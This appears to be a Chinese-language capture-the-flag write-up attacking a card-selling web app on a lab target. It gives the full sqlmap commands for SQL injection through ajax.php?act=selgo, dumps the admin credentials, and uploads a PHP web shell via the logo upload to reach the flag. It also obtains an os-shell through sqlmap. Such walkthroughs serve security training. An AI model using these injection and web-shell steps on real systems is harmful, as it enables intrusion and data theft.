1.靶机目标 http://117.167.136.244:28057
2.靶机为post请求即用burpsuite抓包
打开burpsuite
3.用burpsuite对靶机进行抓包
找到购买卡密
进行购买卡密
打开intercept
抓包成功
找到注入点如下http://117.167.136.244:28057/ajax.php?act=selgo
4.用sqlmap注入
(1)找库:sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” --dbs
(2)找表sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” -D faka --tables
(3)提示要在此"D:\Program Files\Python38\sqlmap\data\txt\common-columns.txt"路径下加上ayangw_k和ayangw_v字段
如下图
提示如下
加载如下即可结束
(4)sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dump
成功找到后台密码pwd
用户名和密码如下:
admin :admin
pwd :MTIzNDU2
5.找到后台入口
由此进入:http://117.167.136.244:28057/admin/
在系统设置中首页LOGO配置中找到上传点
上传shell.php文件
找到文件存储位置
图片地址如图文件上传地址可能在logo.php文件
显示成功
6.用蚁剑连接http://117.167.136.244:28057/assets/imgs/logo.php
找到flag.sh
flag.sh提示在 /home/flag 中
成功找到flag
7.还可用shell找到flag
sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” --os-shel
成功os-shell>
列表如下:
列根目录如下ls /
发现flag.sh
ls /flag.sh
提示flag在/home/flag中
ls /home后找到flag
cat /home/flag后找到flag{64f0d856-62e5-457c-8601-2c5ff11295b2}